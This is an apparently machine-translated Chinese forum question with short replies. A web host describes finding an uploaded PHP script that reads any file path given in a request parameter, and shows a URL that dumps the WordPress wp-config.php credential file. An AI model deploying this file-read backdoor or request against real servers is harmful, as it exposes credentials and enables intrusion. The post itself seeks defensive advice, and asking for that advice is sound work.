我爲客戶託管一個網站,我們被要求爲客戶其他第三方網站商店託管一些額外的圖像。這是PHP代碼惡意,我如何保護我的託管?
因此,我創建了一個輔助FTP帳戶,其根目錄設置爲託管上的某個子文件夾。
客戶端有網頁設計師正在構建這個外部網站的佈局,在這個FTP空間的所有圖像。
今天我注意到了error_log中的一些警告通知,並注意到它來自同樣在這個FTP空間中的php文件。
的PHP的內容是這樣的:
<?php
ini_set('display_errors',1);
$file1=trim($_REQUEST['f1']);
$read1=file_get_contents($file1);
$read1 = rawurlencode($read1);
echo "document.write(unescape(\"$read1\"))";
?>
當我第一次讀碼我無法弄清楚,爲什麼它是在FTP空間或什麼沒有,但我開始加入一些玩弄路徑到f1參數以查看返回的響應,並且我發現我可以輸出我的wordpress安裝wp-config.php文件,該文件是從此FTP根文件夾返回的文件夾。
例如通過運行這個參數通過PHP腳本。它輸出我的配置的內容: domain.com?f1=/mnt/storage/vhosts/domain.com/httpdocs/wordpress/wp-config.php
現在我只是想弄明白這個代碼本來可以放在FTP存儲中的任何其他原因,而不是惡意?
如何保護我的文件不會像這樣在讀取託管子文件夾的FTP訪問權限時被讀取?
謝謝。
只是不給任何人的根,但你... – Fusseldieb
PHP文件**將**執行,但你可以防止它對你的服務器造成損害。只需設置足夠的權限,並且不**與其他用戶共享一個root帳戶。 – Fusseldieb
在互聯網上閱讀「chown」和「chmod」(如果您在服務器上使用linux) – Fusseldieb